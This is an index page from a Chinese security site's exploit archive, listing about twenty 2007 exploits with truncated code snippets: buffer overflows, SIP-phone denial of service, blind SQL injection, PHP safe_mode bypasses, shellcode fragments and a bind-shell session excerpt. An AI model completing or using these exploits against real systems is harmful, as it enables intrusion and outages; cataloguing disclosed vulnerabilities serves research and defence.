首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)
  日期:2007-08-30 20:02:18 点击:78 评论:0
/* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong Chun Woo-Chi * Yang yeon(?~1542), Korea * I shall keep clenching my left fist unitl i see the real tao. * This POC is only for test. If an application read a malf
Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF
  日期:2007-08-29 13:32:07 点击:65 评论:0
!-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object (emsmtp.dll 6.0.1) remote buffer overflow exploit (ie6 / xp sp2 version) passing more than 539 chars to SubmitToExpress method: EAX 00000400 ECX 0013DD24 ASCII Error Creating File: AAAA .
XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
  日期:2007-08-28 12:47:15 点击:74 评论:0
?php //Inphex //htdocs must be accessable and writable,apache must have been ran by root. //to add a user open like this : script.php?qQx // Directory of C:Documents and SettingsAdmin //27.08.2007 16:36 DIR . //27.08.2007 16:36 DIR .. //14.08.2007
BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)
  日期:2007-08-28 12:46:00 点击:37 评论:0
#!/usr/bin/env ruby ###################################################### # BitchX-1.1 Final MODE Heap Overflow [0-day] # By bannedit # Discovered May 16th 2007 # - Yet another overflow which can overwrite GOT # # I found this vuln after modifying i
Thomson SIP phone ST 2030 Remote Denial of Service Exploit
  日期:2007-08-28 12:44:21 点击:77 评论:0
#!/usr/bin/perl #Vulneravility for Thomson 2030 firmware v1.52.1 #It provokes a DoS in the device. use IO::Socket::INET; die Usage $0 dst port username unless ($ARGV[2]); $socket=new IO::Socket::INET-new(PeerPort=$ARGV[1], Proto='udp', PeerAddr=$ARGV
PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)
  日期:2007-08-28 12:43:44 点击:53 评论:0
?php // ================================================================================== // // php_iisfunc.dll PHP = 5.2.0 (win32) Buffer Overflow PoC // // Discovery: boecke boecke@herzeleid.net // Risk: Local Buffer Overflow (Medium - High Risk)
Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit
  日期:2007-08-27 14:51:53 点击:96 评论:0
/* Dreatica-FXP crew * * ---------------------------------------- * Target : Mercury/32 SMTP Server * Found by : muts@offensive-security.com, http://www.offensive-security.com * ---------------------------------------- * Exploit : Mercury/32 v3.32-v4
ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
  日期:2007-08-27 14:49:58 点击:153 评论:0
/* **** Anti-modTLS-0day version 2 *** * * ProFTPd *.*.* + mod_tls remote-root-0day-exploit * * main advantages of this exploit: *1) No patched mod_tls versions yet *2) This is a preauthentication bug *3) Bruteforcing option (eheheheee) * main disadv
SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit
  日期:2007-08-27 14:48:46 点击:47 评论:0
#!/usr/bin/python Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days) import sys import socket sc = xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49 sc += x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x
PHP Perl Extension Safe_mode Bypass
  日期:2007-08-27 14:47:50 点击:57 评论:0
?php ########################################################## ###----------------------------------------------------### ###----PHP Perl Extension Safe_mode Bypass Exploit-----### ###----------------------------------------------------### ###-Autho
SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
  日期:2007-08-27 14:41:01 点击:55 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n \#'#/ ; print n (-.-) ; print n -----------------oOO---(_)---OOo------------------; print n | SunShop v4.0 RC 6 (search) Blind SQL Injection |; print n | k1tk4t - Ind
PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit
  日期:2007-08-24 15:00:55 点击:91 评论:0
?php ########################################################## ###----------------------------------------------------### ###-----PHP FFI Extension Safe_mode Bypass Exploit-----### ###----------------------------------------------------### ###-Teste
Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Exploit
  日期:2007-08-24 14:59:29 点击:79 评论:0
html head titleJoomla Component BibTeX = 1.3 Remote Blind SQL Injection Vulnerability/title /head body !-- # Title : Joomla Component BibTeX = 1.3 Remote Blind SQL Injection Vulnerability -- !-- # Author : ajann -- !-- # Contact : :( -- !-- # S.Page
PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC
  日期:2007-08-24 14:57:26 点击:171 评论:0
?php //PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //greetz to BrainBugger Crew //http://www.brainbugger.altervista.org/ //Bug discovered
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
  日期:2007-08-23 15:50:15 点击:71 评论:0
?php ########################################################## ###----------------------------------------------------### ###--------PHP win32std Buffer Overflow Exploit--------### ###----------------------------------------------------### ###-Teste
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
  日期:2007-08-23 15:48:09 点击:215 评论:0
?php /* Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1n telnet 192.168.2.32 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:apache 7
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
  日期:2007-08-23 15:47:04 点击:336 评论:0
/* Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal) Public Version 1.0 http://www.ph4nt0m.org 2007-08-22 Code by: Zhenhan.Liu Original POC: http://www.milw0rm.com/exploits/4294 Vuln Analysis: http://pstgroup.blogspot.com/2007/
Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit
  日期:2007-08-22 11:57:48 点击:135 评论:0
#!/usr/bin/perl use IO::Socket::INET; die Usage $0 dst-address dst-port dst_username src-address unless ($ARGV[3]); $socket=new IO::Socket::INET-new(PeerPort=$ARGV[1], Proto='udp', PeerAddr=$ARGV[0]); $msg = INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnV
Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit
  日期:2007-08-22 11:54:52 点击:53 评论:0
#!/usr/bin/perl use IO::Socket::INET; die Usage $0 dst port username unless ($ARGV[2]); $socket=new IO::Socket::INET-new(PeerPort=$ARGV[1], Proto='udp', PeerAddr=$ARGV[0]); $msg = INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDPt192.168.1.2
eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit
  日期:2007-08-22 11:51:32 点击:50 评论:0
!-- 17/08/2007 04.41.37 eCentrex VOIP Client module (uacomx.ocx 2.0.1) remote buffer overflow exploit (ie6 / xp sp2) passing more than 164 chars to ReInit method in Username argument EAX 41414131 ECX 0013D444 ASCII AAAAAAAA... EDX 00000000 EBX 000000
共637页/12733条记录 首页 上一页 [541] [542] [543] 544 [545] [546] [547] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved